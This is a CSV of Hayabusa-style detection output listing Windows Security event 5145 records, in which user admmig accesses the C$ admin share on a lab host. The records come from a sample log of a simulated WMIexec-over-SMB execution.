2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
